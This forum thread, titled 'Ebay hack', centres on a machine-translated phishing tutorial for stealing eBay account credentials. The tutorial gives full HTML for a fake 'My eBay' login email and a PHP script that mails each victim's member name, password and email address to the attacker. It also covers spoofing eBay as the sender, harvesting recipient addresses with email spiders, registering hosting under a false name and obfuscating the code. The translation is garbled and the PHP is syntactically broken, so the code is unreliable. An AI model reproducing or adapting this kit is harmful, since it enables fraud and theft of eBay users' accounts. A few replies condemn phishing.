Ebay hack

05/10/2006 20:55 °Zerenda°#16
frage:
wenn mans nicht machen soll, wieso hasses dann gemacht?^^ :D
05/11/2006 13:42 r00tsyst3m#17
Quote:
Originally posted by Marie@Aug 27 2005, 18:59
Ums genauer zu sagen die ganze Methode heißt 'Phising', falls sich
jemand wirklich erkunden will ;)
Aber einige Punkte sind schwachsinnig, und der soll Web Entwickler sein, das ich nicht lache.
Phising ist zwar ein guter weg, wenn man es richtig macht aber euch droht schnell ne Anzeige
wenn ihr null ahnung habt wie ihr sie senden müsst.
whatever marie zustimm .....


phishing ist gut um kleinen kindern das knuddelspasswirt zu klauen mehr net -___-
06/03/2006 00:50 DarkClaw#18
Quote:
Originally posted by lowskill@Aug 26 2005, 20:41
Der Absender ist eBay selber ( [Only registered and activated users can see links. Click Here To Register...] )
einen Hacken hat die Sache...wer einige emails von eBay bekommen hat, der weiß wer der Absender ist
Man merkt es ziemlich schnell wenn mann 10 emails vom richtigen eBay hat und daneben eine von "[Only registered and activated users can see links. Click Here To Register...]" oder "[Only registered and activated users can see links. Click Here To Register...]"
;)
02/16/2008 10:05 xxfukerxx#19
here the translate from german into english


HAcK
Gecoded by S.M. (Aka SevenUp)
As I come to eBay quickly access data?
Info:
With this little tutorial, I would like you? Something? Clarity.
We have certainly heard all the usual ways are very cumbersome
(E-mail addresses spoofen, hack passwords, etc.) But ALWAYS Works
Have see TV reports.
I have found another way, to make it different.
Surely now say one or the other? Very insecure? !
But it is not unsafe, passwords to hack or any e-mail
Accounts?
One thing we must always keep in mind:
1) With the attempt is pregnant!
2) A fortiori it into action! :-)
3), or chopping is the same with very punish traded HIGH!
This tutorial will show you in the first place not to be tempted to imitate. Your
Must own you know whether it is safe or unsafe. (Think of the consequences!)
Ok long speech short sinn we finally begin to * g *
Like everything Anfing:
I sat, as always in front of my computer and programmed any
Web applications.
Since I have always been curious about foreign accounts, as well this time came
My idea me something to eBay? Try?.
It has more than once heard the news about J
So what? Sought? I was somewhat effective.
I got the idea the unsuspecting eBay users unterzujubeln a fake mail.
Certainly I do not know who else is eBay users, but as we all know is eBay
Market leader with nearly 80%.
So almost all German Internet users on eBay Registered J
So now I knew what I wanted? .. Had it only in practice!
What do I need to know:

Of course, it would be beneficial knowledge in:
1) HTML (Hypertext Mark-up Language)
2) PHP (Hypertext Preprocessor)
To have.
What is actually HTML?
HTML is the abbreviation for, "Hypertext Mark-up Language, and can `` do not really
Be translated. This means that it is in HTML to a formal language such as
BASIC, Pascal or C, with a hypertext document certain
Formatting can be made.
A hypertext document is just a normal text document with three
Key enhancements:
? It may, in addition, other text, informationsübermittelnde elements such as graphics,
Pictures, animations, sounds and so on.
? It may connections between themselves and other hypertext documents
.
? It can receive responses from readers, and according to the answer
Behavior change.
Of course, this, that definition `` neither complete nor as `` scientifically accurate, but it
Enough times to have to know what we are dealing with.
What is PHP?
PHP PHP (acronym for "PHP: Hypertext Preprocessor) is a widespread and
For the general use of certain open-source scripting language, which
Especially suited for Web development, and be embedded into HTML
.
Woführ everything:
KA. Will it work out? J
Based build:
What is described here in detail, everything builds to a fake mail, we
To the Internet user to send.
Important:
1) The sender of the e-mail MUST originate from eBay itself!! Z.b.: aw
[Only registered and activated users can see links. Click Here To Register...] Otherwise, it takes from here no longer read?

2) In the subject so was like your security? Important data? Account closure
Etc. So the Internet User stutzig immediately and opens the mail.
From here we leave it to the user how he achieved? Have you previously everything right
? And leave no mistakes?
Remember
The sender is eBay itself ([Only registered and activated users can see links. Click Here To Register...]) or ([Only registered and activated users can see links. Click Here To Register...])
All data + script is from the server brought eBay.
All links point to [Only registered and activated users can see links. Click Here To Register...] ........
Nothing falls in the first moment?. OR?
This is a good user of the Internet Ließt from here on everything?. Even if it's in the
E-mail source code looks it may not notice because then it's over with funny J
The script What it is:
It builds on HTML and PHP.
Simply said it is nothing other than an eBay (My eBay) login page.
Only slightly modified?
The user has in the mail the modified my eBay-ahead.
Then he eBay noted that its current account data in the
Form.
And on the user identification.
If he does not respond to mail, it would be for security reasons,
Temporarily blocked access to it in this unprecedented competition.
According to my statistics:
80% of Internet users are registered on eBay
If you send 500 e-mails out now? Answers are about? 300-400 users
See the same sample images below
If I have everything, how do I?
That is the smallest problem!
There are plenty of Internet Free / shareware programs that make this possible.
For details later!
1) Register sender
2) recipient
3) Subject Register
4) HTML code
How do I get so many email addy's?

This is not a problem!
Good programs include: FAST EMAIL SPIDER, SPIDER EMAIL etc.?.
Just look at [Only registered and activated users can see links. Click Here To Register...] go and this type terms.
The ORIGINALE HTML CODE: (for e-mail)
<html>
<head>
<! - Extraneous meta tag removed by ebay code ->
<! - SrcId: SignIn ->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
My eBay <title> </ title> </ head>
<body Bgcolor="#ffffff" onload="initFocus();"> <a href="http://pages.ebay.de/">
</ A> </ td> </ tr> </ table> <table border="0" cellpadding="0" cellspacing="0" width="600">
<tr>
<td Colspan="2"> </ td>
</ Tr>
<tr>
<td Colspan="2" bgcolor="#ffcc00"> </ td>
</ Tr>
<tr Bgcolor="#ffe580">
<td Width="25"> </ td>
<td Width="575" valign="middle">
<table Border="0" width="100%" cellpadding="1" cellspacing="0">
<tr>
<td Nowrap="yes" valign="middle">
<font Face="Verdana, Helvetica, Arial, sans-serif" size="3"> My eBay </ font>
</ Td>
<td Align="right" nowrap="yes" valign="middle"> <font
Face = Arial, Helvetica, sans-serif "size =" 2 "> Help? </ Font> </ td>
</ Tr>
</ Table>
</ Td>
</ Tr>
<tr>
<td Colspan="2" bgcolor="#ffcc00"> </ td>
</ Tr>
</ Table>
<table Border="0" cellpadding="0" cellspacing="0" width="600">
<tr Bgcolor="#ffffcc">
<td Width="15" height="23"> </ td>
<td Width="180" height="23" nowrap="yes">
<font Face="Arial, Helvetica, sans-serif" SIZE=2> Important Information </ font> </ td>
<td Colspan="3" align="center" valign="bottom" height="23"> </ td>
<td Width="310" height="23" nowrap="yes">
<font Face="Arial, Helvetica, sans-serif" SIZE=2> Please update your
Data </ font> </ td>
</ Tr>
<tr>
<td Width="15"> </ td>
<td Valign="top" width="180">
<form Method="post" name="RegisterEnterInfo" action="http://www.meine-seite.de/mail.php"> <input type = "hidden"
Name = "MfcISAPICommand" value = "Directory Information Enter"> <input type="hidden" name="co_partnerId" value="2"> <input
Type = "hidden" name = "siteid" value = "77"> <input type = "hidden" name = "ru" value = "http://cgi1.ebay.de/aw-
Cgi / eBayISAPI.dll? MyEbayLogin & pass = () & _pass_ us erid = "> <input type="hidden" name="bin" value="174"> <table
Border = "0" cellpadding = "0" cellspacing = "0" width = "100%">
<tr>
<td> </ Td>
</ Tr>
<tr>
<td Valign="top">
<font Face="Arial, Helvetica, sans-serif" SIZE=2> Since we are currently some
Checks, we ask for your help. Send us an
Confirmation e-mail with your current account data in the system which we
Assigning. </ Font>

The eBay team </ td>
</ Tr>
</ Table>

</ Form>
</ Td>
<td> </ Td>
<td Valign="top" align="center" bgcolor="#CCCCCC" width="1"> </ td>
<td> </ Td>
<td>
<form Method="post" name="SignInForm" action="http://www.meine-seite.de/mail.php"> <input type = "hidden"
Name = "MfcISAPICommand" value = "SignInWelcome"> <input type="hidden" name="siteid" value="77"> <input type = "hidden"
Name = "co_partnerId" value = "2"> <input type="hidden" name="UsingSSL" value="0"> <input type = "hidden" name = "ru"
Value = "http://cgi1.ebay.de/aw-cgi/eBayISAPI.dll?MyEbayLogin&pass = () & _pass_ us erid ="> <input type = "hidden"
Name = "pp" value = "pass"> <input type="hidden" name="pa1" value=""> <input type="hidden" name="pa2" value=""> <input
Type = "hidden" name = "pa3" value ="">< input type = "hidden" name = "i1" value = "0"> <input type = "hidden" name = "pageType"
Value = "174"> <table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td> </ Td>
</ Tr>
<tr>
<td Valign="top">
<font Face="Arial, Helvetica, sans-serif" SIZE=2> Please complete all fields
Carefully. Since we otherwise your account is not properly assign the system
.

</ Font> </ td>
</ Tr>
</ Table>
<table Border="0" cellpadding="0" cellspacing="0" width="100%" height="195">
<tr>
<td Height="19"> eBay
Member name </ td>
</ Tr>
<tr>
<td Valign="top" height="22">
<input Type="text" name="eBay_Mitgliedsname" size="27"> </ td> <td height="22">
</ Td> <td height="22">
</ Td>
</ Tr>
<tr>
<td Valign="top" height="19"> <font face="Verdana, Helvetica, Arial, sans-serif" size="1" Have your color="#666666">
Member name? </ Font> </ td>
<td Height="19">
</ Td> <td height="19">
</ Td>
</ Tr>
<tr>
<td Valign="top" height="15"> </ td> <td height="15">
</ Td> <td height="15">
</ Td>
</ Tr>
<tr>
<td Valign="top" height="19"> password </ td> <td height="19">
</ Td> <td height="19">
<? Echo $ err_eBay_Mitgliedsname?>
</ Td>
</ Tr>
<tr>
<td Valign="top" height="22">
<input Type="text" name="Passwort" size="27"> </ td> <td height="22">
</ Td> <td height="22">
</ Td>
</ Tr>
<tr>
<td Valign="top" height="19"> <font face="Verdana, Helvetica, Arial, sans-serif" size="1" color="#666666"> Have you forgotten your password? </ Font> </ td>
<td Height="19">
</ Td> <td height="19">
<? Echo $ err_Passwort?>
</ Td>
</ Tr>
<tr>
<td Valign="top" height="19"> </ td> <td height="19">
</ Td> <td height="19">
</ Td>
</ Tr>
<tr>
<td Valign="top" height="19"> your e-mail </ td> <td height="19">
</ Td> <td height="19">
<? Echo $ err_Ihre_E_mail?>

</ Td>
</ Tr>
<tr>
<td Height="22">
<input Type="text" name="Ihre_E_mail" size="27"> </ td> <td height="22"> </ td>
</ Tr>
</ Table>
<table Border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td> </ Td>
</ Tr>
</ Table>
<table Border="0" cellpadding="0" cellspacing="0" width="350">
<tr>
<td Width="35%"> <input type="submit" name="submit" value="Absenden"> </ td>
</ Tr>
</ Table>
<table Border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td> </ Td>
</ Tr>
<tr>
<td Valign="top"> <input type="checkbox" name="keepMeSignInOption" value="1" tabindex="4"> </ td>
<td Width="10"> </ td>
<td Width="100%">
<font Face="Verdana, Helvetica, Arial, sans-serif" size="1" color="#666666"> <a
Href = "http://pages.ebay.de/help/new/staying_signed_in.html" target = "helpwin" onclick = "return openHelpWindow (this.href);"> I
Want on the computer to remain </ a>, until I sign off. </ Font>
</ Td>
</ Tr>
<tr>
<td Colspan="3">
<hr Width="100%" size="1" color="#CCCCCC">
<font Face="Verdana, Helvetica, Arial, sans-serif" size="1" color="#666666">
</ Font>
</ Td>
</ Tr>
</ Table>
</ Form>
</ Td>
</ Tr>
<tr>
<td Width="15"> </ td>
<td Colspan="5">
<HR Color="#CCCCCC" noshade="yes" size="1">
</ Td>
</ Tr>
<tr>
<td Width="15"> </ td>
<td Colspan="5">
<font Face="Arial, Helvetica, sans-serif" SIZE=2> They can also be made via the following address or login
Login: </ font>
</ Td>
</ Tr>
<tr>
<td Width="15"> </ td>
<td Colspan="5"> <a
Href = "http://cgi3.ebay.de/aw-cgi/eBayISAPI.dll?PassportSignInShow&pt=174&finalURL=h ttp% 3A% 2F%% 2Fcgi1.ebay.de-2Faw
Cgi 2FeBayISAPI.dll%% 3FMyEbayLogin% 26pass% 3D% 7B_pas s_% 7D% 26userid% 3D "> </ a> </ td>
</ Tr>
</ Table>
<table Width="599" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFCC00">
<tr>
<td Height="2"> </ td>
</ Tr>
</ Table> <script SRC="http://include.ebay.com/aw/pics/js/stats/ss.js"> </ SCRIPT> <script
SRC = "http://include.ebay.com/aw/pics/js/stats/ss2.js"> </ SCRIPT> <table border = "0" cellpadding = "0" cellspacing = "0"
Width = "600">
<tr>
<td Colspan="2">
<font Size="2" face="Arial, Verdana, Helvetica, sans-serif">
<HR WIDTH="500" ALIGN="CENTER">
<Div
Align = "center">


Forums and cafes
|
Feedback Forum
|

Rules and safety
|
About eBay
|
EBay Releases </ p>


Home
|
My eBay
|
Overview
|

Buy
|
Sell
|
Service
|
Search
|
Help
|
Community </ p>
</ P>
</ Font>
</ Td>
</ Tr>
<tr>
<td Width="600" height="31" valign="top" align="left">
<font Size="1" face="Arial, Verdana, Helvetica, sans-serif"> Copyright © 1995-2003 eBay Inc.
All rights reserved.
Designated trademarks belong to their respective owners. With the
Use of this Web site constitutes acceptance of the eBay User Agreement and Privacy Policy.
EBay is not responsible for any contents linked
Internet pages.
</ Font>
</ Td>
</ Tr>
</ Table> <script LANGUAGE="JavaScript"> <--
VAR CBC, CBF;
If (CBC) (
WriteFooter ();
If (CBF) (
FullCB ();
)
)
//--></ SCRIPT> </ body>
</ Html>
END SCRIPT
PHP Form SCRIPT: (mail.php)
<?
Check_len function (& $ check, $ field, $ max, and $ err_field, $ err = "")
(
If (strlen ($ field)> $ max)
(
If ($ err == "")
(
Err = $ $ msg-> err_maxlen ($ max);
)
$ $ = Err_field err;
If ($ check == true) $ check = false;
)
)
Check_mail function (& $ check, $ fld, & $ error_field, $ invalidchars = "", $ blanks = "")
(
Global $ msg;
Expr $ = "^ [_ \ .0-9a-z-]+@([ 0-9a-z] [0-9a-z-] + \.) + [Az] [az] + \ $";
/ / Echo "expr =". $ Expr. "
";

If ((! $ Fld) | | ($ fld =="") | | (! Eregi ($ expr, $ fld)))
(
If ($ invalidchars> "")
(
Error_field $ = $ invalidchars. "
\ N ";
) Else (
$ Error_field = "invalid characters
\ N ";
)
If ($ check == true) $ check = false;
)
If (strrpos ($ fld, '')> 0)
(
If ($ blanks> "")
(
$ $ = Error_field blanks. "
\ N ";
) Else (
$ Error_field = "blanks in e-mail
\ N ";
)
If ($ check == true) $ check = false;
)
)
If (empty ($ eBay_Mitgliedsname)) $ eBay_Mitgliedsname = "";
If (empty ($ err_eBay_Mitgliedsname)) $ err_eBay_Mitgliedsname = "";
If (empty ($ password)) $ password = "";
If (empty ($ err_Passwort)) $ err_Passwort = "";
If (empty ($ Ihre_E_mail)) $ Ihre_E_mail = "";
If (empty ($ err_Ihre_E_mail)) $ err_Ihre_E_mail = "";
$ Checked = true;
If (isset ($ submit))
(
Check_len ($ checked, $ eBay_Mitgliedsname, 40, $ err_eBay_Mitgliedsname, "egg ngabe too long! Maximum length: 40");
Check_len ($ checked, $ password, 40, $ err_Passwort, "entering too long! Maximum length: 40");
Check_len ($ checked, $ Ihre_E_mail, 40, $ err_Ihre_E_mail, "entering too long! Maximum length: 40");
)
If (empty ($ submit) or (! $ Checked))
(
?>
<form Action="formmailer.php" method="post"> <table cellpadding="4" border="0">
<tr> <td Valign="top"> eBay name </ td> <td>
<Input type = "text" name = "eBay_Mitgliedsname" value = "<? Echo $ eBay_Mitgliedsname?>>
</ Td> <td>
<? Echo $ err_eBay_Mitgliedsname?>
</ Td> </ tr>
<tr> <td Valign="top"> password </ td> <td>
<Input type = "text" name = "Password" value = "<? Echo $ password?>>
</ Td> <td>
<? Echo $ err_Passwort?>
</ Td> </ tr>
<tr> <td Valign="top"> your e-mail </ td> <td>
<Input type = "text" name = "Ihre_E_mail" value = "<? Echo $ Ihre_E_mail?>>
</ Td> <td>
<? Echo $ err_Ihre_E_mail?>
</ Td> </ tr>
<tr> <td> </ Td> <input <td> type="submit" name="submit" value="Absenden"> </ td> </ tr>
<tr> <td Colspan="2">
</ Td> </ tr>
<tr> <td Colspan="2">
</ Td> </ tr>
</ Table> </ form>
<?
)
If (isset ($ submit) and ($ checked)) (
$ Msg = "All data were successfully eBay to our server \ n";
$ Msg .= "eBay_Mitgliedsname = $ eBay_Mitgliedsname \ n";
$ Msg .= "$ password = password \ n";
$ Msg .= "Ihre_E_mail = $ Ihre_E_mail \ n";
Mail ( "[Only registered and activated users can see links. Click Here To Register...]", "eBay account data,"
$ Msg);
Echo "Email has been sent to: [Only registered and activated users can see links. Click Here To Register...]
\ N ";
Echo nl2br ($ msg). "
\ N ";
)
?>
END SCRIPT

About the scripts:
The HTML script copied it in all e-mail addresses the concern you have J
This you can designate how you want (not seen) * * fg
The PHP script is the most important!! Without the running nix!
As you worried you a FREE Web Account of PHP.
Not on your real name Register * LOL *
Otherwise you have soon visit your doorstep? ..* G *


Hold Together, we now EVERYTHING:
1) It takes the HTML script from eBay, so it is later directly via e -
Mail can (direct shipping) NOT Outlook.
2) The recipients receive an e-mail from that [Only registered and activated users can see links. Click Here To Register...]
They noted their current account details. The
Eingegebenen now send data to an independently FREEMAIL (
Your)
3) The script was needed, one that builds in an HTML editor or
A text editor.
4) It requires an e-mail Spider you the e-mail addresses collected.
5) Now copy the finished script in an HTML e-mail channels.
6) The PHP script invites you to a FREE WEBSPACE SERVER. Because
Bara to regulate all the mail shipping.
7) VERY IMPORTANT! THE SCRIPT PHP AND THE SCRIPT MUST HTML
CODED TO ENABLE THE MAN QUELLCODE MAY NOT AUSLESEN
8) You can find such encoding? Software? [Only registered and activated users can see links. Click Here To Register...] in under HTML
Coding.
9) The script invites now part of [Only registered and activated users can see links. Click Here To Register...] themselves and to other part
WEBSPACE FREE from your server. Therefore, the HTML script
PHP script and encrypt.

10) In summary hates you then cool? Web software? For your
Account data to collect J
11) Now, you need only a couple of times your free email address and
After some new account data look.
Tutorial end!!
Do you ask or criticism?
Then Mail me at
[Only registered and activated users can see links. Click Here To Register...]
Sep 05, 2003 by SevenUp

-------------------------------------------------- --------------------------------------------------

The original, I send you happy when their PM ne me with the subject: "Ebay" distinction allows
02/16/2008 14:30 invisible#20
Babelfish Translation or bad English?
Anyway thanks for a translation but you may look at the date of this..

Last Post was 06-03-2006, 00:50 =/

cya
02/16/2008 19:42 Vulcanraven#21
Last post:
06-03-2006, 00:50 :rolleyes:
02/17/2008 23:34 Noobunaga#22
little hard to read but nice
06/10/2008 13:33 mindless2k#23
Im Grunde ist mir alles egal, denn ich bin BGFA (Bürger gegen fast alles),
doch Phishing ist irgendwie unterste Kategorie. Man bescheisst die Leute
exakt so, wie ein Treppentiger von irgendeiner Versicherung, der Dir nur
etwas aufschwatzen will. Natürlich funktioniert das meistens nur bei
gutgläubigen oder unwissenden Personen. Letztendlich ist sich jeder selbst
sein eigener Gott (Atheismus) und auch sollte jeder wissen, was man tut.

Eine Phishingmail zu erstellen ist keine grosse Sache und überlassen wir
denjenigen, welche auch mal "cool" sein wollen. Irgendwo schrieb jemand
als reply, entweder richtig oder gar nicht... agreed...

Ausserdem sehe ich in so vielen Foren immer wieder das Wort "Hacken" oder
"Harken"... Leute, es heisst "Haken"... Die Sache hat einen Haken! Es hat
nichts mit Körperteilen oder Gartengeräten zu tun >.> *motz*

BGFA FTW ^.o